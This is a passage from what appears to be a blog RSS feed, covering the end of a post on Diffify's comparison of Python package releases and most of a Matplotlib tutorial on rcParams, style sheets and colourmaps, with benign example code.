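def changed_parameters(old, new):
    """Pair up parameters by position and return those that differ."""
    old_params = inspect.signature(old).parameters.values()
    new_params = inspect.signature(new).parameters.values()
    # zip() stops at the shorter signature, so added or removed
    # trailing parameters are not reported by this simple sketch.
    return [(str(o), str(n)) for o, n in zip(old_params, new_params) if o != n]


print(changed_parameters(grid_old, grid_new))
```

&lt;p&gt;Two parameters count as different here if their name, kind, default value or annotation differs, which is roughly the information shown in the &amp;ldquo;Details&amp;rdquo; table.&lt;/p&gt;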
&lt;h4 id="classes"&gt;Classes&lt;/h4&gt;
&lt;p&gt;Here we provide a list of classes that have been added, removed or changed.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the Classes window: A list of package classes is displayed. Each entry displays the class name prefixed by the module path on the left, and a button for accessing the class methods is displayed on the right. Each class is colour-coded based on whether it has been added, removed or changed." height="auto" id="h-rh-i-5" src="https://www.jumpingrivers.com/blog/diffify-python-release-pypi/classes.png" width="1530"&gt;&lt;/p&gt;
&lt;p&gt;Clicking on the &amp;ldquo;Methods&amp;rdquo; button for a class will bring up a pop-up that lists
the methods that belong to that class. The example below shows the methods
&lt;code&gt;.__init__()&lt;/code&gt; and &lt;code&gt;.from_dict()&lt;/code&gt;, which belong to the &lt;code&gt;spines.Spines&lt;/code&gt; class.&lt;/p&gt;
&lt;p&gt;&lt;img alt="A screenshot of the Methods pop-up window for the matplotlib,spines.Spines class: A list of methods belonging to the class is displayed. Each entry displays the method name on the left, and a button for accessing the method “Details” is displayed on the right. Each method is colour-coded based on whether it has been added, removed or changed." height="auto" id="h-rh-i-6" src="https://www.jumpingrivers.com/blog/diffify-python-release-pypi/methods.png" width="1532"&gt;&lt;/p&gt;
&lt;p&gt;Similar to functions, you can access the method arguments by clicking on
&amp;ldquo;Details&amp;rdquo;.&lt;/p&gt;
&lt;h3 id="removing-clutter"&gt;Removing clutter&lt;/h3&gt;
&lt;p&gt;The functions and classes listed above have been detected by analysing the
package source code. We have taken various steps to filter out code that is
intended for internal use by the package developers, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ignoring functions and scripts whose names start with an underscore&lt;/li&gt;
&lt;li&gt;ignoring functions whose names start with &lt;code&gt;test*&lt;/code&gt; and classes whose names start with
&lt;code&gt;Test*&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;leaving out scripts whose names start with &lt;code&gt;test_*&lt;/code&gt; or end with &lt;code&gt;*_test.py&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These criteria are intended to leave out internal code and unit tests.&lt;/p&gt;
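&lt;p&gt;The naming rules above could be sketched in Python along the following lines. This is a hypothetical illustration rather than Diffify&amp;rsquo;s actual code: the function names and the example lists are assumptions, and the rules are applied exactly as worded in the list.&lt;/p&gt;

```python
def keep_function(name):
    """Drop private helpers and test functions."""
    return not name.startswith(("_", "test"))


def keep_class(name):
    """Drop test classes."""
    return not name.startswith("Test")


def keep_script(filename):
    """Drop private modules and test scripts."""
    return not (filename.startswith(("_", "test_"))
                or filename.endswith("_test.py"))


# Hypothetical names, purely for illustration
functions = ["grid", "_helper", "test_grid", "subplots"]
print([name for name in functions if keep_function(name)])
```

&lt;p&gt;Simple prefix and suffix checks like these are cheap to run over many packages, but they can only catch code that follows the usual naming conventions.&lt;/p&gt;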
&lt;h3 id="looking-ahead"&gt;Looking ahead&lt;/h3&gt;
&lt;p&gt;Python has been around for quite a while, and consequently it has &lt;strong&gt;many&lt;/strong&gt;
packages - 400,000 to be precise! Perhaps unsurprisingly, analysing so many
packages for Diffify has proven to be a bit of a challenge&amp;hellip;&lt;/p&gt;
&lt;p&gt;This is why we have initially chosen to focus on the 2000 most popular PyPI
packages. We will soon extend this to the top 5000, according to
&lt;a href="https://hugovk.github.io/top-pypi-packages/" rel="external"&gt;Top PyPI Packages&lt;/a&gt;. And we won&amp;rsquo;t
be stopping there! It remains to be seen whether we will manage to add all
400,000, but we will certainly try our utmost.&lt;/p&gt;
&lt;p&gt;Despite our best efforts to filter out clutter, you may still come across some
functions and classes that are clearly intended for internal use or unit
testing. We will continue to look at ways to improve our filters.&lt;/p&gt;
&lt;p&gt;We hope you enjoy the new content! As always, if you spot any bugs or have any
suggestions please add an issue to our public
&lt;a href="https://github.com/jumpingrivers/diffify/issues" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Stay tuned for more updates&amp;hellip;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/diffify-python-release-pypi/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Customising figures in Matplotlib</title><link>https://www.jumpingrivers.com/blog/customising-matplotlib/</link><pubDate>Thu, 10 Nov 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/customising-matplotlib/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/customising-matplotlib/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/customising-matplotlib/matplot_title_logo.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://matplotlib.org/" rel="external"&gt;Matplotlib&lt;/a&gt; is one of the longest standing and most comprehensive plotting libraries for Python.
It is mostly used for creating static plots and its flexible customisation options
make it a great choice for creating publication quality graphs.&lt;/p&gt;
&lt;p&gt;In this blog post we will look at formatting and colourmap customisation in Matplotlib,
and how to set a consistent plotting style throughout a project.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Note&lt;/em&gt;: If you wish to run the code snippets in this blog yourself you will need:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Matplotlib &amp;gt; 3.6.0&lt;/li&gt;
&lt;li&gt;Numpy&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="global-formatting-with-rcparams"&gt;Global formatting with rcParams&lt;/h2&gt;
&lt;p&gt;In Matplotlib it is possible to change styling settings globally with
&lt;em&gt;runtime configuration (rc) parameters&lt;/em&gt;.
The default Matplotlib styling configuration is set with &lt;code&gt;matplotlib.rcParams&lt;/code&gt;.
This is a dictionary containing formatting settings and their values.
By changing these values we can change default settings throughout an
entire script or notebook.&lt;/p&gt;
&lt;p&gt;For example, if you wanted to set the tick label size to 12pt you would use:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;matplotlib&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;mpl&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rcParams[&lt;span style="color:#a5d6ff"&gt;&amp;#34;xtick.labelsize&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rcParams[&lt;span style="color:#a5d6ff"&gt;&amp;#34;ytick.labelsize&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;12&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you are making a plot for publication, a useful thing to do is enable LaTeX and set the font to be consistent with your LaTeX document. This can be done with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rcParams[&lt;span style="color:#a5d6ff"&gt;&amp;#34;text.usetex&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rcParams[&lt;span style="color:#a5d6ff"&gt;&amp;#34;font.family&amp;#34;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Computer Modern Serif&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The full list of rcParams which you can configure can be found &lt;a href="https://matplotlib.org/3.5.0/api/matplotlib_configuration_api.html#matplotlib.rcParams" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you want to later revert to the default settings for Matplotlib you can do this with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;rcdefaults()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-customising-matplotlib"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="style-sheets"&gt;Style sheets&lt;/h2&gt;
&lt;p&gt;Matplotlib comes with a selection of available style sheets. These define a range of plotting parameters and can be used to apply those parameters to your plots.&lt;/p&gt;
&lt;h3 id="inbuilt-style-sheets"&gt;Inbuilt style sheets&lt;/h3&gt;
&lt;p&gt;After importing Matplotlib, you can see a list of available style sheets with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;matplotlib.pyplot&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;plt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;style&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;available
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will use the plot below as an example.
This was created with the default Matplotlib theme.&lt;/p&gt;
&lt;p&gt;&lt;img src="graphics/default_plot-1.png" alt="Graph with time on the x axis and amplitude on the y axis.
The plot shows two oscillating lines, one in blue and the other in orange.
The background of the plot is white, there are no grid lines.
The axes are labeled and the plot has the title &amp;quot;Damped oscillator&amp;quot;." width="768" /&gt;&lt;/p&gt;
&lt;p&gt;We can change the style of this figure,
as well as every other figure created later in the same script or notebook, with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;style&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;use(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dark_background&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If we now look at our example again, we can see that the formatting has changed.&lt;/p&gt;
&lt;p&gt;&lt;img src="graphics/dark_plot-3.png" alt="Graph with time on the x axis and amplitude on the y axis.
The plot shows two oscillating lines, one in blue and the other in yellow.
The background of the plot is black, the text is white and there are no grid lines.
The text is in the same font." width="768" /&gt;&lt;/p&gt;
&lt;p&gt;If you like the default look of plots in the {ggplot2} R package, there is also a style sheet for that:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;style&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;use(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img src="graphics/ggplot_plot-5.png" alt="Graph with time on the x axis and amplitude on the y axis.
The plot shows two oscillating lines, one in red and the other in blue.
The background of the plot is grey, the text is dark grey and the plot has grid lines.
The text has a larger font size." width="768" /&gt;&lt;/p&gt;
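&lt;p&gt;Calling &lt;code&gt;plt.style.use()&lt;/code&gt; affects every figure created afterwards. If you only want a style sheet for a single figure, Matplotlib also provides the &lt;code&gt;plt.style.context()&lt;/code&gt; context manager. The snippet below is a minimal sketch of that idea; the damped cosine data and the variable names are illustrative assumptions, not the data behind the figures above.&lt;/p&gt;

```python
import matplotlib.pyplot as plt
import numpy as np

# Illustrative data (an assumption, not the data used for the plots above)
t = np.linspace(0, 10, 200)
y = np.exp(-t / 5) * np.cos(2 * t)

# The style sheet only applies to figures created inside the "with" block
with plt.style.context("dark_background"):
    fig_dark, ax_dark = plt.subplots()
    ax_dark.plot(t, y)
    dark_face = ax_dark.get_facecolor()

# Figures created afterwards use whatever settings were active before
fig_after, ax_after = plt.subplots()
after_face = ax_after.get_facecolor()

print(dark_face)   # RGBA background of the axes created inside the context
print(after_face)  # RGBA background of the axes created outside the context
```

&lt;p&gt;This can be handy in a notebook where one plot needs a different look but the rest should keep the current settings.&lt;/p&gt;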
&lt;h3 id="creating-your-own-style-sheet"&gt;Creating your own style sheet&lt;/h3&gt;
&lt;p&gt;If you are writing a paper or a report you may want to define your own set of plotting parameters to be used throughout. You may also want to be able to use these parameters in several scripts and be able to share them with collaborators to ensure a consistent aesthetic. You can do this by creating your own style sheet.&lt;/p&gt;
&lt;p&gt;The inbuilt style sheets are defined in &lt;code&gt;.mplstyle&lt;/code&gt; files. You can find out where these are located by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;os&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;os&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;path&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;join(mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;get_data_path(), &lt;span style="color:#a5d6ff"&gt;&amp;#34;stylelib&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you are using miniconda the path returned will look something like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;~/&lt;/span&gt;miniconda3&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;lib&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;python3&lt;span style="color:#a5d6ff"&gt;.8&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;site&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;packages&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;mpl&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;data&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;stylelib
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In the &lt;code&gt;stylelib/&lt;/code&gt; folder you will find all the inbuilt &lt;code&gt;.mplstyle&lt;/code&gt; files.
Taking a look at the &lt;code&gt;ggplot.mplstyle&lt;/code&gt; file,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# from https://everyhue.me/posts/sane-color-scheme-for-matplotlib/&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;patch&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linewidth: &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;patch&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;facecolor: &lt;span style="color:#a5d6ff"&gt;348&lt;/span&gt;ABD &lt;span style="color:#8b949e;font-style:italic"&gt;# blue&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;patch&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;edgecolor: EEEEEE
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;patch&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;antialiased: &lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;font&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;size: &lt;span style="color:#a5d6ff"&gt;10.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;facecolor: E5E5E5
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;edgecolor: white
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linewidth: &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;grid: &lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;titlesize: x&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;large
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;labelsize: large
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;labelcolor: &lt;span style="color:#a5d6ff"&gt;555555&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;axisbelow: &lt;span style="color:#79c0ff"&gt;True&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# grid/ticks are below elements (e.g., lines, text)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;axes&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;prop_cycle: cycler(&lt;span style="color:#a5d6ff"&gt;&amp;#39;color&amp;#39;&lt;/span&gt;, [&lt;span style="color:#a5d6ff"&gt;&amp;#39;E24A33&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;348ABD&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;988ED5&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;777777&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;FBC15E&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;8EBA42&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;FFB5B8&amp;#39;&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# E24A33 : red&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# 348ABD : blue&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# 988ED5 : purple&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# 777777 : gray&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# FBC15E : yellow&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# 8EBA42 : green&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# FFB5B8 : pink&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;xtick&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;color: &lt;span style="color:#a5d6ff"&gt;555555&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;xtick&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;direction: out
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ytick&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;color: &lt;span style="color:#a5d6ff"&gt;555555&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ytick&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;direction: out
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grid&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;color: white
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grid&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;linestyle: &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# solid line&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;figure&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;facecolor: white
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;figure&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;edgecolor: &lt;span style="color:#a5d6ff"&gt;0.50&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;we can see that it contains a collection of rcParam settings.&lt;/p&gt;
&lt;p&gt;Creating your own style sheet is straightforward. Create a file with a &lt;code&gt;.mplstyle&lt;/code&gt; extension and add your rcParam settings to it, using the same format as the file shown above. If you save this file in &lt;code&gt;stylelib/&lt;/code&gt;, or in a &lt;code&gt;stylelib/&lt;/code&gt; folder inside the user configuration directory returned by &lt;code&gt;mpl.get_configdir()&lt;/code&gt;, you will be able to use your style sheet by name (the file name without the extension) in your Python script with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;style&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;use(&lt;span style="color:#a5d6ff"&gt;&amp;#34;style_sheet_name&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you save your style sheet elsewhere you will need to specify the full or relative path:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plt&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;style&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;use(&lt;span style="color:#a5d6ff"&gt;&amp;#34;path_to_style_sheet/style_sheet_name.mplstyle&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="colourmaps"&gt;Colourmaps&lt;/h2&gt;
&lt;p&gt;Matplotlib has a variety of &lt;a href="https://matplotlib.org/stable/gallery/color/colormap_reference.html" rel="external"&gt;inbuilt colourmaps&lt;/a&gt;
to choose from.
If those colours don&amp;rsquo;t take your fancy then there are also external libraries that provide additional colourmaps.
A popular one is &lt;a href="https://pypi.org/project/palettable/" rel="external"&gt;palettable&lt;/a&gt;, which includes
a series of colourmaps generated from Wes Anderson movies.&lt;/p&gt;
&lt;p&gt;If you are feeling creative, or if you want the colours of your plots to match a particular theme or company branding,
then you can also create your own colourmap.&lt;/p&gt;
&lt;p&gt;A colourmap object takes a number between 0 and 1 and maps this to a colour.
In Matplotlib, there are two colourmap classes: &lt;code&gt;ListedColormap&lt;/code&gt; and &lt;code&gt;LinearSegmentedColormap&lt;/code&gt;.&lt;/p&gt;
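&lt;p&gt;As a quick check of both points, the sketch below looks up two inbuilt colourmaps, prints the class of each, and calls one of them with numbers between 0 and 1. The choice of &amp;ldquo;viridis&amp;rdquo; and &amp;ldquo;cool&amp;rdquo; and the variable names are only for illustration.&lt;/p&gt;

```python
import matplotlib as mpl
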